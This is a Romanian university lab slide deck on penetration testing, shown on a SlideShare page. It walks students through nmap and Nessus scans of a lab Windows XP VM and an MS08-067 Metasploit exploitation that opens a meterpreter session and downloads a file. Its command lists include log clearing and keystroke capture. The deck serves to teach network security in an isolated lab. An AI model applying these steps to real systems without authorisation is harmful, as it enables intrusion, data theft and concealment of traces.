Securitatea Retelelor de Calculatoare Lucrare de laborator Adrian Furtun ă M.Sc. C|EH [email_address]
Scopul lucrarii <ul><li>Exemplificarea unui atac informatic folosind tool-uri open-source: </li></ul><ul><li>Descarcati lo...
Pregatirea Laboratorului  (30 min) <ul><li>Descarcati si instalati urmatoarele tool-uri: </li></ul><ul><ul><li>nmap-5.00-s...
Disclaimer Ethical Hacking / Penetration Testing <ul><li>Actiuni similare unui atacator/hacker </li></ul><ul><li>Scop etic...
Ce vom exersa…  <ul><li>Scanare cu Nmap </li></ul><ul><ul><li>Porturi deschise </li></ul></ul><ul><ul><li>Versiunile servi...
Tinta atacului (victima) <ul><li>Sistem de operare: ????? </li></ul><ul><li>Servicii expuse:  ????? </li></ul><ul><li>Vuln...
Scanare folosind Nmap (1) http:// insecure.org   <ul><li>nmap –h  [fragmente] </li></ul><ul><li>HOST DISCOVERY: </li></ul>...
Scanare folosind Nmap (2) <ul><li>nmap -sS -sV -O -F -n 10.0.40.69 </li></ul>
Scanare folosind Nmap (2) <ul><li>nmap -sS -sV -O -F -n 10.0.40.69 </li></ul><ul><li>Starting Nmap 5.10BETA1 ( http://nmap...
Scanare folosind Nessus (1) http:// www.nessus.org   <ul><li>Nessus Server Manager    Start Nessus Server </li></ul><ul><...
Scanare folosind Nessus (2) http:// www.nessus.org
Obtinerea accesului – Metasploit (1) Arhitectura Metasploit <ul><li>Metasploit Console, Metasploit Web </li></ul><ul><li>M...
Obtinerea accesului – Metasploit (2) http:// www.metasploit.org <ul><li>Exploatam vulnerabilitatea ms08-067 (Conficker/Kid...
Obtinerea accesului – Metasploit (3) http:// www.metasploit.org
Obtinerea accesului – Metasploit (4) http:// www.metasploit.org Stdapi: System Commands     Command       Description     ...
Indeplinirea obiectivului exercitiului <ul><li>Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima e...
The End Va multumesc! Adrian Furtunã M.Sc. C|EH [email_address]   ?  I N T R E B A R I  ?
Upcoming SlideShare
Loading in …5
×

Laboratory exercise - Network security - Penetration testing

3,972 views
3,920 views

Published on

This is a training material for a laboratory exercise that I\'ve practiced with the students at the Master Program - Network Security course

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,972
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
42
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • Recunoastere Activitate pasiva Adunarea de informatii despre tinta (Google, inginerie sociala, dumpster diving, etc) Scanare si Enumerare Activitate activa Descoperirea de porturi deschise, aplicatii, versiuni Descoperire de vulnerabilitati Obtinerea accesului Exploatarea vulnerabilitatilor gasite Escalarea privilegiilor Mentinerea accesului Ex. Rootkits Repararea problemei de securitate pentru a nu fi exploatata de alti hackeri Asigura posibilitatea de a reveni la sistemul atacat Stergerea urmelor si instalarea de backdoors Rootkits, modificarea fisierelor de log Ascunderea fisierelor Instalare troieni
  • Recunoastere Activitate pasiva Adunarea de informatii despre tinta (Google, inginerie sociala, dumpster diving, etc) Scanare si Enumerare Activitate activa Descoperirea de porturi deschise, aplicatii, versiuni Descoperire de vulnerabilitati Obtinerea accesului Exploatarea vulnerabilitatilor gasite Escalarea privilegiilor Mentinerea accesului Ex. Rootkits Repararea problemei de securitate pentru a nu fi exploatata de alti hackeri Asigura posibilitatea de a reveni la sistemul atacat Stergerea urmelor si instalarea de backdoors Rootkits, modificarea fisierelor de log Ascunderea fisierelor Instalare troieni
  • 139: NETBIOS Session Service TCP NetBIOS connections are made over this port, usually with Windows machines but also with any other system running Samba (SMB). These TCP connections form &amp;quot;NetBIOS sessions&amp;quot; to support connection oriented file sharing activities. 445: Microsoft-DS ( Microsoft Directory Services ) is a port used for file sharing. It was introduced with Windows 2000 and gives you the possibility to use SMB protocol (stands for Server Message Block , but is also known as Samba ) directly over TCP-IP on port 445. This port replaces the notorious Windows NetBIOS trio ( ports 137-139 ), for all versions of Windows after NT, as the preferred port for carrying Windows file sharing and numerous other services.
  • Offline update: https://plugins.nessus.org/offline.php Nessus-fetch.exe –challenge Nessus-fetch.exe –code-in-use
  • Offline update: https://plugins.nessus.org/offline.php Nessus-fetch.exe –challenge Nessus-fetch.exe –code-in-use
  • Laboratory exercise - Network security - Penetration testing

    1. 1. Securitatea Retelelor de Calculatoare Lucrare de laborator Adrian Furtun ă M.Sc. C|EH [email_address]
    2. 2. Scopul lucrarii <ul><li>Exemplificarea unui atac informatic folosind tool-uri open-source: </li></ul><ul><li>Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima exploatand o vulnerabilitate a acesteia. </li></ul><ul><li>Parcurgerea etapelor unui atac*: </li></ul><ul><ul><li>Recunoastere - </li></ul></ul><ul><ul><li>Scanare si Enumerare - Nmap, Nessus </li></ul></ul><ul><ul><li>Obtinerea accesului - Metasploit </li></ul></ul><ul><ul><li>Escalarea privilegiilor - </li></ul></ul><ul><ul><li>Mentinerea accesului - </li></ul></ul><ul><ul><li>Stergerea urmelor si instalarea de backdoors - </li></ul></ul>* conform documentatiei pentru certificarea Certified Ethical Hacker (ECCouncil)
    3. 3. Pregatirea Laboratorului (30 min) <ul><li>Descarcati si instalati urmatoarele tool-uri: </li></ul><ul><ul><li>nmap-5.00-setup.exe ( http:// nmap.org ) </li></ul></ul><ul><ul><li>Nessus-4.0.2-i386.msi ( http:// www.nessus.org ) </li></ul></ul><ul><ul><li>framework-3.3.3.exe ( http:// www.metasploit.org ) </li></ul></ul><ul><li>Update Nessus plugins </li></ul><ul><ul><li>“ Obtain an activation code” (home feed) </li></ul></ul><ul><ul><li>“ Register” (dupa inregistrare incepe automat update-ul plugin-urilor) </li></ul></ul><ul><li>Pregatirea victimei: </li></ul><ul><ul><li>Descarcati local si dezarhivati arhiva: winxp_SP2_strip.zip </li></ul></ul><ul><ul><li>Porniti masina virtuala: Windows XP Professional.vmx </li></ul></ul><ul><ul><li>Autentificare: (user: user , pass: user ) </li></ul></ul><ul><li>Verificare conectivitate (private network Host  Guest): </li></ul><ul><ul><li>ping Host  Guest </li></ul></ul>
    4. 4. Disclaimer Ethical Hacking / Penetration Testing <ul><li>Actiuni similare unui atacator/hacker </li></ul><ul><li>Scop etic: </li></ul><ul><ul><li>Descoperirea vulnerabilitatilor </li></ul></ul><ul><ul><li>Propunerea de masuri corective </li></ul></ul><ul><ul><li>Fara actiuni distructive/neaprobate </li></ul></ul><ul><ul><li>Activitate proactiva, preventiva </li></ul></ul>
    5. 5. Ce vom exersa… <ul><li>Scanare cu Nmap </li></ul><ul><ul><li>Porturi deschise </li></ul></ul><ul><ul><li>Versiunile serviciilor expuse </li></ul></ul><ul><ul><li>Versiunea sistemului de operare </li></ul></ul><ul><li>Scanare cu Nessus </li></ul><ul><ul><li>Cautare automata de vulnerabilitati pentru serviciile gasite anterior </li></ul></ul><ul><li>Exploatarea unei vulnerabilitati folosind Metasploit </li></ul><ul><ul><li>Obtinerea accesului la sistemul tinta </li></ul></ul>
    6. 6. Tinta atacului (victima) <ul><li>Sistem de operare: ????? </li></ul><ul><li>Servicii expuse: ????? </li></ul><ul><li>Vulnerabilitati: ????? </li></ul><ul><li>Masina virtuala (vmware) </li></ul><ul><li>Firewall ON/OFF </li></ul><ul><li>Fara antivirus </li></ul>
    7. 7. Scanare folosind Nmap (1) http:// insecure.org <ul><li>nmap –h [fragmente] </li></ul><ul><li>HOST DISCOVERY: </li></ul><ul><li>-sP: Ping Scan - go no further than determining if host is online </li></ul><ul><li>-PN: Treat all hosts as online -- skip host discovery </li></ul><ul><li>-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports </li></ul><ul><li>-n/-R: Never do DNS resolution/Always resolve [default: sometimes] </li></ul><ul><li>SCAN TECHNIQUES: </li></ul><ul><li>-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans </li></ul><ul><li>-sU: UDP Scan </li></ul><ul><li>-sN/sF/sX: TCP Null, FIN, and Xmas scans </li></ul><ul><li>PORT SPECIFICATION AND SCAN ORDER: </li></ul><ul><li>-p <port ranges>: Only scan specified ports </li></ul><ul><li>-F: Fast mode - Scan fewer ports than the default scan </li></ul><ul><li>SERVICE/VERSION DETECTION: </li></ul><ul><li>-sV: Probe open ports to determine service/version info </li></ul><ul><li>SCRIPT SCAN: </li></ul><ul><li>-sC: equivalent to --script=default </li></ul><ul><li>--script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories </li></ul><ul><li>OS DETECTION: </li></ul><ul><li>-O: Enable OS detection </li></ul><ul><li>OUTPUT: </li></ul><ul><li>-oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename. </li></ul>
    8. 8. Scanare folosind Nmap (2) <ul><li>nmap -sS -sV -O -F -n 10.0.40.69 </li></ul>
    9. 9. Scanare folosind Nmap (2) <ul><li>nmap -sS -sV -O -F -n 10.0.40.69 </li></ul><ul><li>Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time </li></ul><ul><li>Nmap scan report for 10.254.40.69 </li></ul><ul><li>Host is up (0.00011s latency). </li></ul><ul><li>Not shown: 98 filtered ports </li></ul><ul><li>PORT STATE SERVICE VERSION </li></ul><ul><li>139/tcp open netbios-ssn </li></ul><ul><li>445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds </li></ul><ul><li>MAC Address: 00:0C:29:86:DF:91 (VMware) </li></ul><ul><li>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port </li></ul><ul><li>Device type: general purpose </li></ul><ul><li>Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%) </li></ul><ul><li>Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%) </li></ul><ul><li>No exact OS matches for host (test conditions non-ideal). </li></ul><ul><li>Network Distance: 1 hop </li></ul><ul><li>Service Info: OS: Windows </li></ul><ul><li>OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . </li></ul><ul><li>Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds </li></ul>
    10. 10. Scanare folosind Nessus (1) http:// www.nessus.org <ul><li>Nessus Server Manager  Start Nessus Server </li></ul><ul><li>Nessus Client </li></ul><ul><ul><li>Connect - clientul se conecteaza la server </li></ul></ul><ul><ul><li>+ Networks to scan - se specifica IPul statiei tinta </li></ul></ul><ul><ul><li>+ Select a scan policy – se creaza o noua politica de scanare </li></ul></ul><ul><ul><ul><li>Plugin Selection  Disable All </li></ul></ul></ul><ul><ul><ul><li>Plugin Selection  Windows (activeaza numai plugin-urile pentru Windows) </li></ul></ul></ul><ul><ul><li>Scan Now - incepe scanarea </li></ul></ul><ul><ul><li>Export - salveaza raportul rezultat </li></ul></ul>
    11. 11. Scanare folosind Nessus (2) http:// www.nessus.org
    12. 12. Obtinerea accesului – Metasploit (1) Arhitectura Metasploit <ul><li>Metasploit Console, Metasploit Web </li></ul><ul><li>Modules </li></ul><ul><ul><ul><li>Exploits - exploateaza o vulnerabilitate si livreaza un payload </li></ul></ul></ul><ul><ul><ul><li>Auxiliaries – port scanning, dos, fuzzing, etc </li></ul></ul></ul><ul><ul><ul><li>Payloads - incapsuleaza cod arbitrar (shellcode) care este executat in urma unui exploit </li></ul></ul></ul><ul><ul><ul><li>Nops – genereaza instructiuni de tip NOP cu dimensiune arbitrara </li></ul></ul></ul><ul><li>Tutorial: http://www.offensive-security.com/metasploit-unleashed / </li></ul>
    13. 13. Obtinerea accesului – Metasploit (2) http:// www.metasploit.org <ul><li>Exploatam vulnerabilitatea ms08-067 (Conficker/Kido/Downadup) http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx </li></ul><ul><li>Start Metasploit Web </li></ul><ul><li>Exploits -> Search [ms08-067] </li></ul><ul><li>Set TARGET - Windows XP SP2 English </li></ul><ul><li>Set PAYLOAD - windows/meterpreter/bind_tcp (sau reverse_tcp) </li></ul><ul><li>Set OPTIONS - RHOST (adresa IP a victimei) </li></ul><ul><li>Exploit </li></ul>
    14. 14. Obtinerea accesului – Metasploit (3) http:// www.metasploit.org
    15. 15. Obtinerea accesului – Metasploit (4) http:// www.metasploit.org Stdapi: System Commands     Command       Description     -------       -----------     clearev       Clear the event log     execute       Execute a command     kill          Terminate a process     ps            List running processes     reboot        Reboots the remote computer     shell         Drop into a system command shell    sysinfo       Gets information about the remote system, such as OS Stdapi: User interface Commands     Command        Description     -------        -----------     keyscan_dump   Dump they keystroke buffer     keyscan_start  Start capturing keystrokes     keyscan_stop   Stop capturing keystrokes <ul><li>Meterpreter help [fragmente] </li></ul><ul><li>Stdapi: File system Commands </li></ul><ul><li>Command Description </li></ul><ul><li>------- ----------- </li></ul><ul><li>cat Read the contents of a file to the screen </li></ul><ul><li>cd Change directory </li></ul><ul><li>del Delete the specified file </li></ul><ul><li>download Download a file or directory </li></ul><ul><li>edit Edit a file </li></ul><ul><li>getlwd Print local working directory </li></ul><ul><li>getwd Print working directory </li></ul><ul><li>lcd Change local working directory </li></ul><ul><li>lpwd Print local working directory </li></ul><ul><li>ls List files </li></ul><ul><li>mkdir Make directory </li></ul><ul><li>pwd Print working directory </li></ul><ul><li>rm Delete the specified file </li></ul><ul><li>rmdir Remove directory </li></ul><ul><li>upload Upload a file or directory </li></ul>
    16. 16. Indeplinirea obiectivului exercitiului <ul><li>Descarcati local fisierul secrets.txt aflat pe desktop-ul statiei victima exploatand o vulnerabilitate a acesteia.. </li></ul><ul><li>Meterpreter: </li></ul><ul><ul><li>pwd </li></ul></ul><ul><ul><li>cd Desktop </li></ul></ul><ul><ul><li>ls </li></ul></ul><ul><ul><li>download </li></ul></ul>
    17. 17. The End Va multumesc! Adrian Furtunã M.Sc. C|EH [email_address] ? I N T R E B A R I ?

    ×